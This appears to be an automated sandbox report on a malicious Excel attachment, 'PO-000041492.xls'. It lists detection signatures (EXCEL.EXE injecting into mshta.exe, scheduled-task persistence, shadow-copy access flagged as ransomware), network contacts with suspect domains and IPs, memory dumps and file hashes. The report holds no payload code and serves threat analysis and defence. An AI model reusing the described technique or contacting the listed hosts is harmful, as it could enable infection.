N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 2512 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4900 wrote to memory of 2512 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.108.45.5.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.134.89:80 e6.o.lencr.org tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 231.187.63.66.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/4900-0-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-2-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-1-0x00007FFCED6ED000-0x00007FFCED6EE000-memory.dmp

memory/4900-3-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-4-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-5-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-6-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-7-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-10-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-9-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-8-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-11-0x00007FFCAB180000-0x00007FFCAB190000-memory.dmp

memory/4900-12-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-13-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-14-0x00007FFCAB180000-0x00007FFCAB190000-memory.dmp

memory/4900-15-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-17-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-20-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-22-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-21-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-19-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-18-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-16-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-42-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-47-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-49-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-50-0x00007FFCED6ED000-0x00007FFCED6EE000-memory.dmp

memory/4900-51-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-52-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-56-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-57-0x00007FF71B540000-0x00007FF71B548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 53f5cc349c48d618cb6f424053c93e2f
SHA1 1bc41fd2c400f577eb582137b518a3e7d5974a90
SHA256 930dabe78b62d9f5349ec459392e91c536ae8c001958a68548c6123325ec954a
SHA512 8c143bf58bb9185fec0403639f0dfa93bb22b0bcbdc5b26b8222f1961ffe602516ef2ff3251f91f4e4969ef7ff06b3efe860e559b463ed02ca3348873bde2bbf